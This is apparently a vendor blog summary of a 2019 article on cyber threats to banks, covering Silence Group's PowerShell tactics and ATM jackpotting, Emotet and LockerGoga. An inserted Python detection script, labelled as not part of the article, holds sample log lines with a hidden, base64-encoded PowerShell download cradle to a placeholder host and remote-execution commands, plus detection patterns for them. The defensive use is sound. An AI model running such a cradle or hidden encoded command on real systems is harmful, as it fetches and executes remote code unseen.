This is a summary of an article written for Global Banking and Finance Review by Fortinet’s Senior Security Strategist/Researcher and CTI Lead, Tony Giandomenico. The entire article can be accessed here.
Cyber criminals continue to target the financial services industry to steal payment card data, online banking accounts, and to compromise ATM machines using ransomware, cryptomining, and other malware. Defending against this is made more difficult due to challenges such as blending new technology with legacy systems while meeting evolving compliance standards.
A recent Fortinet Threat Landscape Report highlights threats targeted at a number of industries, including financial services. Coinhive, originally launched in 2017, focused on the Monero cryptocurrency and had great success in the black market. However, Coinhive announced in February that it would be shutting down, in part because the value of Monero crashed and because an algorithm change made mining Monero slower.
However, cyber criminals have been quick to fill the gap by developing several new techniques to replace Coinhive.
One such criminal enterprise is Silence Group. While they primarily target financial institutions in Russia and eastern Europe, the infrastructure they rely on to support their criminal activities has expanded to include Australia, Canada, France, Ireland, Spain, Sweden, and the United States.
At the same time, Silence Group has grown more sophisticated, recently employing “living off the land” tactics by leveraging pre-installed and publicly available tools such as PowerShell. This allows them to accelerate lateral movement across a network while enhancing evasiveness, because they use processes the network has already identified as legitimate.
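As an added illustration (not part of the article and not Fortinet's tooling), the following Python triage script shows how a defender can surface living-off-the-land PowerShell activity of the kind described above from PowerShell script block logs: it flags encoded commands, hidden windows and download cradles, decodes the encoded payload so encoding does not hide it, and flags a host/user pair that fans out remote commands to several machines. The host names, user names and log entries are constructed samples, and the fan-out threshold of two targets is an assumption to tune per environment.

```python
import base64
import re

# Constructed sample payload for the encoded-command event (not from the article):
# a download cradle, base64-encoded as UTF-16LE the way PowerShell's -EncodedCommand expects.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()

# Constructed script block log entries (Event ID 4104 style): (host, user, script_text)
SAMPLE_EVENTS = [
    ("WS-07", "jsmith", "Get-ChildItem C:\\Users\\jsmith\\Documents"),
    ("WS-07", "jsmith", f"powershell -nop -w hidden -enc {ENCODED}"),
    ("WS-07", "jsmith", "Invoke-Command -ComputerName FS-01 -ScriptBlock { whoami }"),
    ("WS-07", "jsmith", "Invoke-Command -ComputerName DC-01 -ScriptBlock { net user }"),
    ("ADMIN-01", "svc_backup", "Invoke-Command -ComputerName FS-01 -ScriptBlock { Get-Service }"),
]

# Indicators commonly associated with living-off-the-land PowerShell use.
RULES = {
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(r"Net\.WebClient|Invoke-WebRequest|\bIEX\b|Invoke-Expression", re.I),
    "remote_exec": re.compile(r"(?:Invoke-Command|Enter-PSSession)\b.*-ComputerName\s+(\S+)", re.I),
}

def decode_encoded_command(script):
    """Return the plaintext of an -EncodedCommand argument, or None if absent or undecodable."""
    m = RULES["encoded_command"].search(script)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(script):
    """Names of the rules the script triggers. The decoded payload is checked as well,
    so base64-encoding a cradle does not hide it from the download_cradle rule."""
    texts = [script]
    decoded = decode_encoded_command(script)
    if decoded:
        texts.append(decoded)
    return [name for name, rx in RULES.items() if any(rx.search(t) for t in texts)]

def lateral_movement_fanout(events, threshold=2):
    """(host, user) pairs that ran remote commands against >= threshold distinct targets."""
    targets = {}
    for host, user, script in events:
        m = RULES["remote_exec"].search(script)
        if m:
            targets.setdefault((host, user), set()).add(m.group(1).upper())
    return {k: sorted(v) for k, v in targets.items() if len(v) >= threshold}
```

Running `score_event` over each entry and `lateral_movement_fanout` over the whole batch turns a stream of individually legitimate PowerShell invocations into two alerts: the hidden, encoded download cradle on WS-07 and the same user's remote execution against two different servers.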
In another attack, this one a spear phishing strategy, the Silence Group managed to compromise banks to gather financial data and enable the remote withdrawal of money from ATMs, an attack known as “jackpotting.”
Another criminal team, known as Emotet, launched several new campaigns during Q1 of 2019 using information-stealing, ransomware, and banking Trojan modules.
One serious development is a shift away from random attacks and towards things like tailored ransomware. One recent example is LockerGoga, a ransomware variant that surfaced early this year.
“Despite causing severe disruption to targets in Europe and the United States through attacks informed by research and due diligence, researchers have pointed out the end goal of these attacks was not extortion. There is still not a clear understanding of the motivation.”
However, what is clear is that highly targeted attacks, especially when combined with advanced living-off-the-land tactics, help cyber criminals evade detection, bypass security sensors, and achieve their goals with little to no recourse for their targets. For example, little about LockerGoga sets it apart from other ransomware in terms of functional sophistication, and while most ransomware tools use some level of obfuscation to avoid detection, analysis of LockerGoga found very little of it.
“Cyber criminals continue to modify their attack strategies to increase accuracy and achieve their primary goals. For the financial services industry, this can result in the targeting of online banking accounts, payment cards, and, as was demonstrated in Q1, even ATM machines.”
To defend against these sophisticated threats, financial institutions must rely on threat intelligence and advanced behavioral and system analytics to identify threats and limit the impact of these new targeted cyberattacks.
This is a summary of an article written for Global Banking and Finance Review entitled, Understanding the Impact of Targeted Cyber Threats on Financial Services, written by Fortinet’s Senior Security Strategist/Researcher and CTI Lead, Anthony Giandomenico, and published on GlobalBankingandFinance.com on June 26, 2019.
Read about the FortiGuard Security Rating Service, which provides security audits and best practices.